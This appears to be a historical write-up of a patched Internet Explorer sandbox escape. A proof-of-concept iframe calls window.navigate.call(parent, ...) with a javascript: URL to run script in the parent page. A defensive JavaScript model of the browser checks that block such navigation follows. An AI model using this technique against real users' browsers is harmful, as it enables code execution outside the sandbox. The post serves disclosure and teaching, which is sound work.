Similar to the window.open.call(parent) technique I found earlier, this variation called the navigate method on behalf of the parent with a javascript: URL, executing arbitrary code in the parent’s context from inside a sandboxed iframe.
<!-- parent page -->
<iframe sandbox="allow-scripts" src="sandboxed.html"></iframe>
<!-- sandboxed.html -->
<script>
// Modern approach using .call()
window.navigate.call(parent, "javascript:alert(document.body.innerText)");
// Quirks mode equivalent (no .call needed)
// parent.navigate("javascript:alert(document.body.innerText)");
</script>
The navigate method, like open, could be invoked in the context of any accessible window object using .call(). When called on parent, the resulting navigation happened in the parent’s security context, running the javascript: URL without any sandbox enforcement. In quirks mode the method could be called directly on the parent reference without .call at all, since the .call function itself did not exist in older Trident versions.
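For contrast, the checks a correctly enforcing browser is expected to apply to this request can be written down as a small model. This is an added example, not code from the original post or from any browser; the function names, result fields and reason strings are hypothetical, and it covers only a sandboxed frame navigating its parent.

```javascript
// Added example: simplified model of the decision a browser is expected to make
// when a sandboxed iframe asks to navigate its parent. All names are hypothetical.

function isJavascriptUrl(url) {
  // URL parsing drops tab/newline characters and leading control/space characters,
  // so normalise first to avoid being fooled by "java\tscript:" or " javascript:".
  const cleaned = url.replace(/[\t\n\r]/g, "").replace(/^[\u0000-\u0020]+/, "");
  return /^javascript:/i.test(cleaned);
}

// sandbox:        value of the iframe's sandbox attribute, e.g. "allow-scripts"
// parentIsTop:    true when the parent is the top-level page (as in the post)
// sameOriginPage: true when the framed URL shares the parent's origin
// userActivation: true when the request follows a user gesture in the frame
function decideParentNavigation({ sandbox, parentIsTop, url,
                                  sameOriginPage = false, userActivation = false }) {
  const tokens = new Set(sandbox.toLowerCase().split(/\s+/).filter(Boolean));

  // 1. Sandboxed frames may not navigate an ancestor unless it is the top-level
  //    page and top navigation was explicitly granted.
  if (!parentIsTop) {
    return { allowed: false, reason: "ancestor-navigation-blocked" };
  }
  const topGranted = tokens.has("allow-top-navigation") ||
    (tokens.has("allow-top-navigation-by-user-activation") && userActivation);
  if (!topGranted) {
    return { allowed: false, reason: "top-navigation-not-granted" };
  }

  // 2. A javascript: URL executes in the target's context, so the requester must
  //    be same-origin with it. Without allow-same-origin the framed document has
  //    an opaque origin and is never same-origin with the parent.
  const sameOrigin = sameOriginPage && tokens.has("allow-same-origin");
  if (isJavascriptUrl(url) && !sameOrigin) {
    return { allowed: false, reason: "javascript-url-cross-origin" };
  }
  return { allowed: true, reason: "ok" };
}

// The request from the post: sandbox="allow-scripts", parent is the top page.
const postCase = decideParentNavigation({
  sandbox: "allow-scripts",
  parentIsTop: true,
  url: "javascript:alert(document.body.innerText)",
});
console.log(postCase); // refused at step 1, before the URL scheme is even considered
```

The last combination in the model, allow-scripts plus allow-same-origin on a same-origin page, is the one case where a javascript: navigation of the parent passes both checks, which is why that pairing is treated as no sandbox at all.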
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.